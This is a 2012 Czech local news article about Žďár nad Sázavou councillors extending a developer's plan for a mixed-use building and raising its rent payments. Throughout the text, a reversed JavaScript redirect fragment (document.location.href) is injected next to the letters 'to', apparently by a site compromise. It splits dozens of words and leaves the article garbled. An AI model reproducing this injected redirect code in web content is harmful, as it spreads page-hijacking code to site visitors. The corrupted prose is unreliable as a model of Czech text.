Žďár nad Sázavou, zdar nad sazavou, aktuality, polyfunkční dům, výstavba
Rainbow page separator

Radní prodloužili záměr na výstavbu polyfunkčního domu

Sobota, 16. června 2012

Žďár nad Sázavou/ Žďárští městští radní se na svém posledním zasedání shodli na prodloužení záměru společnosti PLF dům. Ta má na pozemku před zdravotnickou školou ve Žďáře vybudovat polyfunkční dům. V areálu, který nese název Zelený park, by podle projektu měla vzniknout místa pro obchody, kanceláře i pro bydlení. „Velkou výhodou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to záměru jsou také nová parkovací místa, která by lokalitě v okolí ulice Palachova velmi pomohla,“ nechal se slyšet první žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Jaromír Brychta.

Inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor ale nyní požádal vedení okresního města o prodloužení záměru. „To jsme odsouhlasili, ale pouze za určitých podmínek, které by pro nás byly zárukou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to firma myslí skutečně vážně,“ vyjádřila se žďárská starostka a sená[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka Dagmar Zvěřinová. Pozemek před zdravotnickou školou zatím společnost PLF dům v majetku definitivně nemá. Převeden by na ni měl být podle vedení Žďáru až po kolaudaci plánovaného objektu. „Do té doby nám firma platí určitý nájem. Ten doposud činil s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to a dvě stě tisíc korun během dvou let,“ uvedl Jaromír Brychta. Nyní členové rady navrhli ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roční poplatky dále navýšit, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vždy o s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc korun. V roce 2015 by tak částka činila už 600 tisíc korun. V roce 2016 by následně musel podnik PLF dům doplatit zbývající část peněz chybějící do pěti milionů. Právě tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to položku měla [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž firma uhradit za vybudování již ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového kruhového objezdu u parku U Ivana. Tehdy [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ale za ni udělalo měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. „O peníze, které bude ročně hradit, společnost nepřijde – částky jsou zúč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelné,“ podotkla Dagmar Zvěřinová s tím, že více podrobností bude vedení města znát až po vyjádření samotného inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora.  (zp)